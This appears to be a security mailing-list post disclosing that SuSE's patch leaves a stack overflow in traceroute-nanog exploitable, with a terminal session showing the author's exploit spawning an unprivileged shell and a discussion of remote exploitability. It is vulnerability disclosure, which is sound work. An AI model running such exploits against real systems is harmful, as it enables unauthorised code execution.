RE: Exploit for traceroute-nanog overflow

[Carl Livitt <carl () learningshophull co uk>]

Hi all,

Further to my email posting a working exploit for traceroute-nanog on SuSE 
boxes, it would appear the the patch provided by SuSE does not address the 
overflow my exploit... um... exploits.

On a patched SuSE 7.2 box:

carl@titan:~/exploits/traceroute-nanog > rpm -qa | grep traceroute
traceroute-6.1.1-0
carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -d
Now run this exploit with the '-e' flag.
carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -e
traceroute to www.yahoo.akadns.net (64.58.76.230), 30 hops max, 40 byte 
packets
 1 sh-2.05$ id
uid=500(carl) gid=100(users) groups=100(users)
sh-2.05$

Note that traceroute now drops root privileges (properly; there is no way to 
get them back), so even though it is still possible to execute arbitrary code 
via a stack overflow, it cannot be done as root.

Of course, if an attacker could control the server that traceroute uses to 
lookup DNS admin contact names, then it would be possible to exploit this 
flaw remotely. However, the default server used by traceroute is 'localhost' 
which makes this almost impossible to exploit in any other way except locally 
on an unpatched system.

Cheers,
Carl.